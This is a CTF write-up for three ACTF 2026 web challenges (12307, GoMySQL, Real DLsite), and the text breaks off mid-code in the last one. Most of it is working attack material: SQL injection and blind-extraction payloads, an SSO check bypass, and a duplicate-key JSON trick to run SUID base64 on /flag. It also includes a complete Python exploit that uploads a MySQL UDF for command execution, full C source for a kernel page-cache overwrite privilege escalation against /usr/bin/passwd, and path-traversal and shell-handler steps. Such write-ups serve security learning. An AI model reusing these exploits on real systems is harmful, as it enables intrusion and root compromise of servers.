
ACTF 2026: Web Challenges

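CTFs are getting less and less fun; they are now almost entirely AI-driven.

The stronger AI gets, the more challenges have to be hardened against AI, so they keep getting harder until humans can no longer cope, and in the end the work is handed to AI anyway.

As for where that leaves humans? 希腊奶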

12307

Dockerfile

COPY --chmod=0600 --chown=root:root flag /flag
...
chown root:root /flag
chmod 0600 /flag
chown root:root /usr/bin/base64
chmod 4755 /usr/bin/base64

/flag is readable only by root, but /usr/bin/base64 is SUID root, so the goal is to make the server execute: /usr/bin/base64 /flag
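As a quick sanity check of the two modes set in the Dockerfile, the sketch below decodes them with Python's stat module. The helper name describe_mode is made up for illustration; only the modes 0600 and 4755 come from the Dockerfile.

```python
import stat

def describe_mode(mode: int) -> dict:
    """Decode the permission bits that matter for this challenge."""
    return {
        "suid": bool(mode & stat.S_ISUID),        # process runs with the owner's effective uid
        "other_read": bool(mode & stat.S_IROTH),  # readable by unprivileged users
        "other_exec": bool(mode & stat.S_IXOTH),  # executable by unprivileged users
    }

flag_mode = describe_mode(0o600)     # /flag
base64_mode = describe_mode(0o4755)  # /usr/bin/base64

print(flag_mode)
print(base64_mode)
```

Mode 4755 combines the SUID bit with world-executable permissions, which is why any local user can read /flag through base64.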

The print path is in services/print_spooler/worker.py:

program = str(ticket.get("driverProgram", ""))
argument = str(ticket.get("driverArgument", ""))
...
value = run_driver(program, argument)

The startup script defines the device permissions:

{
  "profile-delta-closeout": {
    "codec": "settlement-filter",
    "acceptedPrograms": ["/usr/bin/base64"]
  },
  "profile-north-closeout": {
    "codec": "settlement-filter",
    "acceptedPrograms": ["/usr/bin/printf"]
  },
  "profile-baggage-preview": {
    "codec": "settlement-filter",
    "acceptedPrograms": ["/usr/bin/printf"]
  }
}

Only profile-delta-closeout may run /usr/bin/base64. In services/fixtures/railway_business.json, this profile belongs to the HGH device PR-HGH-042:

{
  "deviceRef": "PR-HGH-042",
  "stationCode": "HGH",
  "deviceClass": "counter-layout",
  "codec": "settlement-filter",
  "enabled": 1,
  "driverProfile": "profile-delta-closeout"
}
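The two fragments above can be joined to confirm which device is worth targeting. This is a minimal sketch: the dictionaries are trimmed copies of the snippets shown, and devices_accepting is a hypothetical helper, not code from the challenge.

```python
# acceptedPrograms per driver profile, copied from the startup script excerpt
PROFILES = {
    "profile-delta-closeout": ["/usr/bin/base64"],
    "profile-north-closeout": ["/usr/bin/printf"],
    "profile-baggage-preview": ["/usr/bin/printf"],
}

# The only device record quoted in this writeup
DEVICES = [
    {"deviceRef": "PR-HGH-042", "stationCode": "HGH", "driverProfile": "profile-delta-closeout"},
]

def devices_accepting(program: str) -> list:
    """Return deviceRefs whose driver profile whitelists `program`."""
    return [
        device["deviceRef"]
        for device in DEVICES
        if program in PROFILES.get(device["driverProfile"], [])
    ]

print(devices_accepting("/usr/bin/base64"))
```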

So we need to reach the trusted settlement for HGH and change the print plan to:

{
  "driverProgram": "/usr/bin/base64",
  "driverArgument": "/flag"
}

In the /api/station-office/fares/reprice handler of services/station_portal/app.py, the legacy-rank mode of tariffScope concatenates expr directly into ORDER BY:

def fare_scope_expression(scope):
    ...
    if scope.get("mode") == "legacy-rank":
        return str(scope.get("expr", "ticket_no"))[:240]
sql = (
    "SELECT ticket_no,station_code,status FROM ticket_index "
    "WHERE station_code IN (%s,'BJP') "
    f"ORDER BY {scope} LIMIT 1"
)

The ticket_no of the first row then decides which bucket is returned:

bucket = "north-window" if row and str(row.get("ticket_no", "")).startswith("T-BJP-") else "local-window"

This gives a boolean blind injection for reading station_claim_artifacts.claim_salt. Construct:

CASE WHEN (
  ASCII(SUBSTRING(
    (SELECT claim_salt FROM station_claim_artifacts WHERE order_id='xxx' LIMIT 1),
    2,1
  )) > 77
) THEN (station_code='BJP') ELSE (station_code='HGH') END DESC

A north-window response means the condition is true; local-window means it is false.
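The extraction loop can be sketched offline with an in-memory SQLite database standing in for the target. Everything here is an assumption made for illustration: the table contents, the secret, and the use of SQLite's unicode(substr(...)) in place of the ASCII(SUBSTRING(...)) used against the real backend. Only the shape of the ORDER BY expression follows the payload above.

```python
import sqlite3

SALT_QUERY = "(SELECT claim_salt FROM station_claim_artifacts WHERE order_id='xxx' LIMIT 1)"

def make_db(secret: str) -> sqlite3.Connection:
    """Build a tiny stand-in for the two tables involved."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE ticket_index (ticket_no TEXT, station_code TEXT, status TEXT);
        INSERT INTO ticket_index VALUES ('T-HGH-7608-019', 'HGH', 'open');
        INSERT INTO ticket_index VALUES ('T-BJP-0001', 'BJP', 'open');
        CREATE TABLE station_claim_artifacts (order_id TEXT, claim_salt TEXT);
        """
    )
    db.execute("INSERT INTO station_claim_artifacts VALUES ('xxx', ?)", (secret,))
    return db

def oracle(db: sqlite3.Connection, pos: int, threshold: int) -> bool:
    """True when character `pos` (1-based) of the salt has a code point above `threshold`."""
    expr = (
        f"CASE WHEN (unicode(substr({SALT_QUERY}, {pos}, 1)) > {threshold}) "
        "THEN (station_code='BJP') ELSE (station_code='HGH') END DESC"
    )
    sql = (
        "SELECT ticket_no FROM ticket_index "
        "WHERE station_code IN ('HGH','BJP') "
        f"ORDER BY {expr} LIMIT 1"
    )
    first_ticket = db.execute(sql).fetchone()[0]
    return first_ticket.startswith("T-BJP-")  # the "north-window" case

def extract(db: sqlite3.Connection, max_len: int = 64) -> str:
    """Binary-search each character; stop when a position yields no character."""
    chars = []
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(db, pos, mid):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:  # past the end of the string: every comparison was false
            break
        chars.append(chr(lo))
    return "".join(chars)

recovered = extract(make_db("s4Lt-Xy"))
print(recovered)
```

Binary search needs about 7 requests per ASCII character, which matters later because some server-side state expires quickly.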

Then, in services/receipt_signer/app.py:

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)

first_wins_object keeps the first value of a duplicated key, while plain json.loads keeps the last one.
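The parser differential is easy to reproduce locally. The body of first_wins_object below is an assumption reconstructed from the behaviour described; the real implementation in receipt_signer is not shown in this writeup.

```python
import json

def first_wins_object(pairs):
    """Keep the first value seen for each key (assumed behaviour of the real hook)."""
    result = {}
    for key, value in pairs:
        result.setdefault(key, value)
    return result

payload_text = '{"printProfile": "counter-copy", "printProfile": "clearing-batch"}'

public_view = json.loads(payload_text, object_pairs_hook=first_wins_object)
render_view = json.loads(payload_text)  # default dict construction: last value wins

print(public_view["printProfile"], render_view["printProfile"])
```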

Validation uses public_view:

checks = {
    "batchId": batch_id,
    "orderId": order["order_id"],
    "stationCode": order["station_code"],
    "templateDigest": template_digest,
    "routeName": route_name,
    "ledgerRef": str((boarding_channel or {}).get("ledgerRef", "")),
    "printProfile": "counter-copy",
    "printer": "thermal-standard",
}
for key, expected_value in checks.items():
    if str(public_view.get(key, "")) != str(expected_value):
        return None, ["partner_receipt_review"]

But the print plan is built from render_view:

print_plan = {
    "profile": str(render_view.get("printProfile", "counter-copy"))[:64],
    "printer": str(render_view.get("printer", "thermal-standard"))[:64],
    "prefix": str(render_view.get("prefix", "reconciliation"))[:48],
    "cell": str(render_view.get("cell", "receipt"))[:48],
    "ledgerRef": checks["ledgerRef"],
    "boardingNonce": str((boarding_channel or {}).get("boardingNonce", "")),
    "driverProgram": str(render_view.get("driverProgram", ""))[:160],
    "driverArgument": str(render_view.get("driverArgument", ""))[:160],
}

So duplicate keys can be injected directly: the first occurrence passes validation and the later one controls the rendered result.

With the vulnerabilities identified, what remains is a path that delivers the malicious print_plan to PR-HGH-042.

We can take the HGH line directly; the trusted route, layout, and device are all already in the configuration. In services/ticketing_api/app.py, G7608 starts with 0 business seats:

{
    "id": "G7608",
    ...
    "stationCode": "HGH",
    "initial": {"business": 0, "first": 4, "second": 18},
}

An order created for that seat class therefore goes to the waitlist.

First call:

POST /api/mobile/identity/continue

services/sso_gateway/server.js performs only very weak string checks here:

const partnerOk = metadata.text.includes("railway-partner") || metadata.text.includes("PassengerIdentityProvider");
const audienceOk = tagValue(assertion.text, "Audience") === "12307" || assertion.text.includes("mobile-passenger");
const nameOk = Boolean(tagValue(assertion.text, "NameID")) || assertion.text.includes("PassengerID");
const relayOk = relay.text.includes("continue") || relay.text.includes("seat-hold");

Send:

{
  "partnerMetadata": "railway-partner compatBinding",
  "relayState": ["continue"],
  "assertion": "<Audience>12307</Audience><NameID>pwn</NameID>",
  "passenger": "pwn",
  "partnerId": "mobile-passenger",
  "stationCode": "HGH",
  "trustLevel": ["mobile", "partner", "settlement"]
}

Then call:

POST /api/mobile/orders/hold
{"trainId":"G7608","seatClass":"business","holdMode":"waitlist"}

This request first passes through edge_gateway, which triggers another continuation check, marks the session complete, and returns waitlist_session.

Next, create the order:

POST /api/mobile/orders
{"trainId":"G7608","seatClass":"business","passenger":"pwn"}

With the orderId in hand, the Redis state that trusted settlement depends on still has to be prepared.

First write a station notice:

POST /api/desk/notices

Set proxyHint to:

X-Desk-Lane: delta-window-27
X-Board-Window: seat-window-e27
X-Desk-Key-Id: POL-HGH-TRUSTED
X-Desk-Key: delta-window-27

Then call:

POST /api/desk/imports/health

with parameters:

{
  "stationCode": "HGH",
  "adapter": "station-partner-feed",
  "target": "rail-cache://redis/partner/metadata?stationCode=HGH",
  "payload": "sync"
}

services/station_import/app.py then writes:

  • rail:interline:lane:HGH

  • rail:board:profile:HGH

  • rail:partner:jwks:HGH

Then connect to:

GET /api/connect/boarding?stationCode=HGH

Send three websocket messages in order:

{"type":"boarding.hello","channel":"<waitlist_session or its first 8 characters>"}
{"type":"boarding.bind","topic":"seat-consist","trainId":"G7608","seatClass":"business"}
{"type":"boarding.confirm","orderId":"<orderId>","stationCode":"HGH","epoch":"1"}

The server returns ledgerRef and writes rail:ledger:channel:<orderId> to Redis.

Now run the blind injection for claim_salt. Once it has been recovered, compute locally:

claim_digest = sha256(f"{orderId}|G7608|HGH|T-HGH-7608-019|{claim_salt}")
claim_proof = f"CP-{claim_salt}-{claim_digest[:12]}"
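A runnable version of the two lines above might look like the following. It assumes that sha256 means the lowercase hex digest of the UTF-8 encoded string, which the [:12] slice suggests but the writeup does not state; build_claim_proof and its parameter names are hypothetical.

```python
import hashlib

def build_claim_proof(order_id: str, claim_salt: str,
                      train_id: str = "G7608",
                      station: str = "HGH",
                      ticket_no: str = "T-HGH-7608-019") -> str:
    """Rebuild claim_proof from the recovered salt (hex digest is an assumption)."""
    material = f"{order_id}|{train_id}|{station}|{ticket_no}|{claim_salt}"
    claim_digest = hashlib.sha256(material.encode("utf-8")).hexdigest()
    return f"CP-{claim_salt}-{claim_digest[:12]}"

# Placeholder inputs, not values from the real instance
proof = build_claim_proof("ORDER-PLACEHOLDER", "salt-placeholder")
print(proof)
```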

Then call:

POST /api/desk/tickets/adjust

with:

{
  "ticketNo": "T-HGH-7608-019",
  "claimProof": "<computed value>",
  "memo": "{\"stationCode\":\"HGH\",\"channel\":\"fare-desk\",\"lineItems\":{\"reason\":\"FARE-91\",\"layout\":\"folio-grid-27\",\"device\":\"PR-HGH-042\",\"enabled\":true}}",
  "delta": 1
}

The memo must match the HGH policy in services/fixtures/railway_business.json:

"claim": {
  "reason": "FARE-91",
  "channel": "fare-desk"
},
"layout": {
  "cell": "receipt",
  "device": "PR-HGH-042"
}

Then run the import once more:

POST /api/desk/imports/health

with parameters:

{
  "stationCode": "HGH",
  "adapter": "station-desk-ledger",
  "target": "rail-cache://redis/desk-ledger?orderId=<orderId>&stationCode=HGH",
  "payload": "apply"
}

This step runs:

UPDATE waitlist_entries SET sampled=1 ...
UPDATE station_profiles SET batch_open=1, renderer_profile=..., signer_route=...
INSERT INTO tariff_exception_claims ...

After station-desk-ledger has been applied, the database has three changes:

  • waitlist_entries.sampled=1, corresponding to fare_sample_review

  • station_profiles.batch_open=1, renderer_profile=folio-grid-27, signer_route=delta-window-27, corresponding to station_profile_review

  • a new PR-HGH-042 record in tariff_exception_claims, which enterprise-clearing uses later

What is still missing is rail:layout:entitlement:<orderId>, which is written to Redis later by receipts/prepare.

Next, call:

POST /api/corporate/reconciliation

Set defer=true so that only the batch is created for now:

{
  "orderId": "<orderId>",
  "stationCode": "HGH",
  "batchId": "<batchId>",
  "reportType": "carrier-closeout",
  "defer": true,
  "data": {"carrier": "exploit"}
}

Then build the malicious carrierSeal. The key parts of the payload are:

{
  "batchId":"...",
  "orderId":"...",
  "stationCode":"HGH",
  "templateDigest":"...",
  "routeName":"delta-window-27",
  "ledgerRef":"...",
  "printProfile":"counter-copy",
  "printer":"thermal-standard",
  "printProfile":"clearing-batch",
  "printer":"line-printer",
  "prefix":"reconciliation",
  "cell":"receipt",
  "driverProgram":"/usr/bin/base64",
  "driverArgument":"/flag"
}

The first printProfile and printer pass validation; the later printProfile and printer take effect in render_view, which also satisfies the layout_enabled condition:

layout_enabled = (
    not reasons
    and receipt["render_grant"] == station_cfg.get("grantCode")
    and print_plan.get("profile") == "clearing-batch"
    and print_plan.get("printer") == "line-printer"
)

Add to that:

"driverProgram":"/usr/bin/base64",
"driverArgument":"/flag"

The request then ends up in the chain PR-HGH-042 -> profile-delta-closeout -> /usr/bin/base64 /flag.
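A Python dict cannot hold the same key twice, so the duplicate-key payload has to be serialized from an ordered list of pairs. The helper dumps_pairs below is a hypothetical sketch, and the pair list contains only the fields whose values are spelled out above; the elided fields (batchId, orderId, and so on) would be added in the same way.

```python
import json

def dumps_pairs(pairs) -> str:
    """Serialize (key, value) pairs in order, allowing a key to repeat."""
    return "{" + ",".join(f"{json.dumps(k)}:{json.dumps(v)}" for k, v in pairs) + "}"

pairs = [
    # First occurrences: the values the validator expects
    ("printProfile", "counter-copy"),
    ("printer", "thermal-standard"),
    # Later occurrences: the values the renderer ends up using
    ("printProfile", "clearing-batch"),
    ("printer", "line-printer"),
    ("driverProgram", "/usr/bin/base64"),
    ("driverArgument", "/flag"),
]

payload_text = dumps_pairs(pairs)
print(payload_text)
```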

Sign the seal with the key that belongs to POL-HGH-TRUSTED, then submit:

POST /api/corporate/receipts/prepare

This request first passes through enterprise_gateway, whose code contains:

await mergeLayoutClaim(orderId, stationCode);

enterprise_gateway forwards the request to enterprise-clearing in station_import, which calls activate_layout_claim(order_id, station_code). Afterwards Redis contains:

redis.command("SET", f"rail:layout:entitlement:{order_id}", station_code, "EX", "180")

That clears layout_review as well.

One more detail, in services/waitlist_push/server.js:

await redisCommand("SET", `rail:fulfillment:epoch:${orderId}`, "boarding", "EX", "7");

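This key lives for only 7 seconds. Blind-injecting claim_salt against the remote is slow, so if waitlist/pulse was called earlier, the state has already expired by the time settlement is actually scheduled, and the result is only: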

{
  "ready": false,
  "reasons": ["review_required"],
  "body": "Reconciliation ... [layout-pending]"
}

So once the blind injection has finished, call again:

POST /api/mobile/waitlist/pulse
{"orderId":"<orderId>"}

Finally, schedule:

POST /api/corporate/settlement/schedule
{"batchId":"<batchId>"}

Then poll:

GET /api/corporate/reconciliation/<batchId>

On success it returns:

{
  "batchId":"B55EEFD108D",
  "report":{
    "batchId":"B55EEFD108D",
    "ready":true,
    "reasons":[],
    "body":"Reconciliation O92G72UK7HJ waitlisted QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9\n",
    "finishedAt":1778377062
  }
}

Base64-decoding the trailing segment gives the flag:

ACTF{wHy_ar1_y0u_so0O0o0Oo0o_Fas1?????_C2Cfw6ryD94}
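The decoding step, as a short sketch using the body string from the response above:

```python
import base64

body = (
    "Reconciliation O92G72UK7HJ waitlisted "
    "QUNURnt3SHlfYXIxX3kwdV9zbzBPMG8wT28wb19GYXMxPz8/Pz9fQzJDZnc2cnlEOTR9\n"
)

# The driver output is the last whitespace-separated token of the report body
encoded = body.split()[-1]
flag = base64.b64decode(encoded).decode()
print(flag)
```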

GoMySQL

Second blood

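Start by testing the expression parameter submitted to /calc; it is concatenated into a SQL statement. Payloads containing keywords trigger a filter response, and further testing shows that besides the injection itself, the backend allows semicolon-separated multi-statement execution. The input goes through a blacklist that blocks at least the literals SELECT, UPDATE, FLAG, SCHEMA, @@, and _.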

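Because the target database supports execute immediate, the SQL that should really run can be hex-encoded and then triggered through a stacked statement. Verification script: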

import binascii
import urllib.parse
import urllib.request

base = "http://target/calc"
sql = "show databases"
payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
data = urllib.parse.urlencode({"expression": payload}).encode()
print(urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore"))

This executes arbitrary SQL reliably without tripping the blacklist. Start by confirming the environment, for example:

show databases
select database()
select load_file('/etc/passwd')
select @@plugin_dir
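Why the wrapper gets these statements past the filter can be checked locally. The sketch below assumes the blacklist is a case-insensitive substring match over the tokens observed above; the real filter may differ, and blocked_tokens is a made-up helper.

```python
import binascii

# Tokens observed to be filtered; the matching rule itself is an assumption
BLACKLIST = ["SELECT", "UPDATE", "FLAG", "SCHEMA", "@@", "_"]

def wrap(sql: str) -> str:
    """Hex-encode a statement and run it through execute immediate."""
    return "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()

def blocked_tokens(payload: str) -> list:
    """Return the blacklist tokens that appear in the payload."""
    lowered = payload.lower()
    return [token for token in BLACKLIST if token.lower() in lowered]

raw_sql = "select @@plugin_dir"
print(blocked_tokens(raw_sql))
print(blocked_tokens(wrap(raw_sql)))
```

The wrapped payload consists only of the fixed prefix and the characters 0-9 and a-f, so none of the filtered literals can appear in it.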

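This confirms that the current database is testdb, that load_file works, and that the MySQL plugin directory can be read. At this point the challenge is no longer about business data but about turning SQL execution into system command execution.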

A UDF is used here. Write a precompiled sys_eval shared library into plugin_dir as hex, then drop and recreate the function of the same name. The core steps:

def exec_sql(sql):
    expr = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
    data = urllib.parse.urlencode({"expression": expr}).encode()
    return urllib.request.urlopen(base, data=data).read().decode("utf-8", "ignore")

udf_hex = open("lib_mysqludf_sys_so.hex.txt", "r", encoding="utf-8").read().strip()
plugin_dir = "/usr/lib/mysql/plugin/"
udf_name = "libudf_x.so"

exec_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
exec_sql("drop function if exists sys_eval")
exec_sql(f"create function sys_eval returns string soname '{udf_name}'")
print(exec_sql("select sys_eval('id') as x"))

The result shows uid=100(mysql) gid=101(mysql), confirming command execution as the mysql user. Next, check the permissions on the target file:

select sys_eval('ls -l /flag; stat /flag 2>/dev/null || true')

/flag is owned by root:root with mode 600, so the mysql user cannot read it directly.

The local privilege escalation uses copy.fail.

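Upload two prebuilt ELF binaries: copyfail_patch, which uses the vulnerability to overwrite a SUID file at chosen offsets, and flagcat, whose logic is just setuid(0); setgid(0); open("/flag"); write(1, ...). Both are uploaded to /tmp as hex byte streams and made executable: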

patch_hex = open("copyfail_patch.hex.txt", "r", encoding="utf-8").read().strip()
flagcat_hex = open("flagcat.hex.txt", "r", encoding="utf-8").read().strip()

exec_sql(f"select 0x{patch_hex} into dumpfile '/tmp/cfpatch_x'")
exec_sql(f"select 0x{flagcat_hex} into dumpfile '/tmp/flagcat_x'")
exec_sql("select sys_eval('chmod 755 /tmp/cfpatch_x /tmp/flagcat_x')")
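The *.hex.txt inputs are plain hex dumps of the compiled binaries. One way to produce them is sketched below; to_hex_file is a hypothetical helper, and the demo bytes are a stand-in rather than a real ELF.

```python
import binascii
import pathlib
import tempfile

def to_hex_file(binary_path, hex_path) -> int:
    """Write the hex dump of `binary_path` to `hex_path`; return the byte count."""
    data = pathlib.Path(binary_path).read_bytes()
    pathlib.Path(hex_path).write_text(binascii.hexlify(data).decode("ascii"))
    return len(data)

with tempfile.TemporaryDirectory() as tmp:
    src = pathlib.Path(tmp) / "demo.bin"
    dst = pathlib.Path(tmp) / "demo.hex.txt"
    src.write_bytes(b"\x7fELF\x02\x01\x01\x00")  # first 8 bytes of a 64-bit ELF header
    size = to_hex_file(src, dst)
    hex_text = dst.read_text().strip()

print(size, hex_text)
```

For the real run the same call would be applied to the compiled copyfail_patch and flagcat binaries, and to the UDF shared library.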

copyfail_patch.c

#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <linux/if_alg.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

#ifndef SOL_ALG
#define SOL_ALG 279
#endif

static void die(const char *msg) {
    perror(msg);
    exit(1);
}

static void do_patch(int fd, size_t off, const unsigned char *chunk, size_t len) {
    int sfd, afd, pipes[2];
    struct sockaddr_alg sa;
    unsigned char key[40] = {
        0x08, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x10
    };
    unsigned char payload[8];
    struct msghdr msg;
    struct iovec iov;
    unsigned char cbuf[CMSG_SPACE(4) + CMSG_SPACE(20) + CMSG_SPACE(4)];
    struct cmsghdr *cmsg;
    uint32_t zero = 0;
    uint32_t assoclen = 8;
    struct {
        uint32_t ivlen;
        unsigned char iv[16];
    } ivmsg;
    loff_t splice_off = 0;
    size_t want;
    unsigned char *drain;

    memset(&sa, 0, sizeof(sa));
    sa.salg_family = AF_ALG;
    strcpy((char *)sa.salg_type, "aead");
    strcpy((char *)sa.salg_name, "authencesn(hmac(sha256),cbc(aes))");

    sfd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (sfd < 0) die("socket");
    if (bind(sfd, (struct sockaddr *)&sa, sizeof(sa)) < 0) die("bind");
    if (setsockopt(sfd, SOL_ALG, ALG_SET_KEY, key, sizeof(key)) < 0) die("setsockopt key");
    if (setsockopt(sfd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, &zero, sizeof(zero)) < 0) {
        die("setsockopt authsize");
    }

    afd = accept(sfd, NULL, 0);
    if (afd < 0) die("accept");

    memset(&msg, 0, sizeof(msg));
    memset(&ivmsg, 0, sizeof(ivmsg));
    ivmsg.ivlen = 16;
    memset(payload, 0, sizeof(payload));
    memset(payload, 'A', 4);
    memcpy(payload + 4, chunk, len);

    iov.iov_base = payload;
    iov.iov_len = 4 + len;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
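    msg.msg_controllen = sizeof(cbuf);
    memset(cbuf, 0, sizeof(cbuf)); /* CMSG_NXTHDR may inspect the next header, so start from zeroed memory */

    cmsg = CMSG_FIRSTHDR(&msg);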
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_OP;
    cmsg->cmsg_len = CMSG_LEN(4);
    memset(CMSG_DATA(cmsg), 0, 4);

    cmsg = CMSG_NXTHDR(&msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_IV;
    cmsg->cmsg_len = CMSG_LEN(sizeof(ivmsg));
    memcpy(CMSG_DATA(cmsg), &ivmsg, sizeof(ivmsg));

    cmsg = CMSG_NXTHDR(&msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
    cmsg->cmsg_len = CMSG_LEN(4);
    memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));

    if (sendmsg(afd, &msg, MSG_MORE) < 0) die("sendmsg");
    if (pipe(pipes) < 0) die("pipe");
    if (splice(fd, &splice_off, pipes[1], NULL, off + 4, 0) < 0) die("splice file->pipe");
    if (splice(pipes[0], NULL, afd, NULL, off + 4, 0) < 0) die("splice pipe->sock");

    want = off + 8;
    drain = malloc(want);
    if (drain == NULL) die("malloc drain");
    (void)recv(afd, drain, want, 0);
    free(drain);

    close(pipes[0]);
    close(pipes[1]);
    close(afd);
    close(sfd);
}

int main(int argc, char **argv) {
    FILE *fp;
    int fd;
    long sz;
    unsigned char *buf;
    size_t i;

    if (argc != 3) {
        fprintf(stderr, "usage: %s <target> <payload>\n", argv[0]);
        return 1;
    }

    fp = fopen(argv[2], "rb");
    if (fp == NULL) die("fopen payload");
    if (fseek(fp, 0, SEEK_END) != 0) die("fseek");
    sz = ftell(fp);
    if (sz < 0) die("ftell");
    if (fseek(fp, 0, SEEK_SET) != 0) die("fseek");

    buf = malloc((size_t)sz);
    if (buf == NULL) die("malloc");
    if (fread(buf, 1, (size_t)sz, fp) != (size_t)sz) die("fread");
    fclose(fp);

    fd = open(argv[1], O_RDONLY);
    if (fd < 0) die("open target");

    for (i = 0; i < (size_t)sz; i += 4) {
        size_t chunk_len = (size_t)sz - i;
        if (chunk_len > 4) {
            chunk_len = 4;
        }
        do_patch(fd, i, buf + i, chunk_len);
    }

    close(fd);
    free(buf);
    return 0;
}

Then pick /usr/bin/passwd as the target SUID program to overwrite:

print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql("select sys_eval('/tmp/cfpatch_x /usr/bin/passwd /tmp/flagcat_x')"))
print(exec_sql("select sys_eval('od -An -tx1 -N 64 /usr/bin/passwd')"))
print(exec_sql("select sys_eval('/usr/bin/passwd 2>&1 | head -n 20')"))

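The first od confirms the original ELF header. After the patch, the second od shows that the header has changed, which means copy.fail has replaced the target SUID file with the custom payload. Running /usr/bin/passwd then prints /flag with root privileges.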

The full exploit follows (the .hex.txt files must be prepared beforehand):

import argparse
import binascii
import html
import pathlib
import random
import re
import string
import urllib.parse
import urllib.request

ROOT = pathlib.Path(__file__).resolve().parent

def rand_suffix(n=6):
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(n))

class Exploit:
    def __init__(self, url):
        clean = url.rstrip("/")
        self.calc = clean if clean.endswith("/calc") else clean + "/calc"

    def raw(self, payload):
        data = urllib.parse.urlencode({"expression": payload}).encode()
        req = urllib.request.Request(self.calc, data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
        return urllib.request.urlopen(req, timeout=120).read().decode("utf-8", "ignore")

    def run_sql(self, sql):
        payload = "1;execute immediate 0x" + binascii.hexlify(sql.encode()).decode()
        return self.raw(payload)

    def sys_eval(self, cmd):
        cmd = cmd.replace("\\", "\\\\").replace("'", "''")
        return self.run_sql(f"select sys_eval('{cmd}') as x")

    def rebuild_sys_eval(self):
        udf_hex = (ROOT / "lib_mysqludf_sys_so.hex.txt").read_text().strip()
        udf_name = "libudf_" + rand_suffix() + ".so"
        plugin_dir = "/usr/lib/mysql/plugin/"
        self.run_sql(f"select 0x{udf_hex} into dumpfile '{plugin_dir}{udf_name}'")
        self.run_sql("drop function if exists sys_eval")
        self.run_sql(f"create function sys_eval returns string soname '{udf_name}'")
        print(self.run_sql("select sys_eval('id') as x"))

    def get_flag(self):
        suffix = rand_suffix()
        patch_hex = (ROOT / "copyfail_patch.hex.txt").read_text().strip()
        flagcat_hex = (ROOT / "flagcat.hex.txt").read_text().strip()
        patch = f"/tmp/cfpatch_{suffix}"
        flagcat = f"/tmp/flagcat_{suffix}"
        self.run_sql(f"select 0x{patch_hex} into dumpfile '{patch}'")
        self.run_sql(f"select 0x{flagcat_hex} into dumpfile '{flagcat}'")
        self.sys_eval(f"chmod 755 {patch} {flagcat}")
        print(self.sys_eval("ls -l /flag; stat /flag 2>/dev/null || true"))
        print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
        print(self.sys_eval(f"{patch} /usr/bin/passwd {flagcat}"))
        print(self.sys_eval("od -An -tx1 -N 64 /usr/bin/passwd"))
        print(self.sys_eval("/usr/bin/passwd 2>&1 | head -n 20"))

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument("--url", required=True)
    args = parser.parse_args()
    exp = Exploit(args.url)
    exp.rebuild_sys_eval()
    exp.get_flag()

if __name__ == "__main__":
    main()

The flag obtained:

ACTF{y0u1_sqI_Y0ur_Go!!!!!_dxqmcFIr4ZCpo5OeNqSL}

Real DLsite

Third blood

Log in first with the default administrator credentials:

admin / 123456

Then create an fs drive whose root path is a directory traversal:

{
  "name": "rootish",
  "enabled": true,
  "type": "fs",
  "config": "{\"path\":\"../../../../\"}"
}
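The config field is itself a JSON document stored as a string, so it is easy to get the escaping wrong by hand. A small sketch that lets json.dumps do both levels of encoding (field values are the ones shown above; nothing else is assumed about the API):

```python
import json

# Inner document: the drive-specific configuration
drive_config = {"path": "../../../../"}

# Outer document: "config" carries the inner document as a JSON string
drive = {
    "name": "rootish",
    "enabled": True,
    "type": "fs",
    "config": json.dumps(drive_config, separators=(",", ":")),
}

body = json.dumps(drive, indent=2)
print(body)
```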

After init and reload, the container's root directory is reachable through rootish/.... Two writable locations matter:

/app/config.yml
/app/data/script-drives/

The admin script-eval endpoint executes JS directly and can write files through drive.Save:

var tf = newTempFile();
tf.Write(newBytes("PING"));
tf.SeekTo(0, SEEK_START);
var ctx = newTaskCtx(newContext());
var e = drive.Save(ctx, "rootish/app/ping.txt", tf.Size(), true, tf);
log("saved=" + e.Path());

Edit /app/config.yml to enable a shell handler for thumbnails:

    - type: shell
      tags: pwn
      file-types: txt
      config:
        shell: /bin/sh
        mime-type: text/plain
        write-content: "1"
        max-size: "-1"
        timeout: 10m

Also set thumbnail.handlersMapping:

{
  "thumbnail.handlersMapping": "pwn:rootish/tmp/*.txt"
}

Write a malicious script drive that panics when a thumbnail is generated. The panic restarts the service, which then rereads config.yml.

Write /app/data/script-drives/evil.js:

/// <reference path="./scripts/env/drive.d.ts"/>
defineCreate(function (ctx, config, utils) {
  return {
    meta: function (ctx) { return {}; },
    get: function (ctx, path) {
      if (path === '' || path === '/') {
        return { Path: '', IsDir: true, Size: -1, ModTime: Date.now() };
      }
      if (path !== 'x.txt' && path !== '/x.txt') throw ErrNotFound();
      return { Path: 'x.txt', IsDir: false, Size: 1, ModTime: Date.now(), Meta: { Readable: true, Writable: false } };
    },
    list: function (ctx, path) {
      return [this.get(ctx, 'x.txt')];
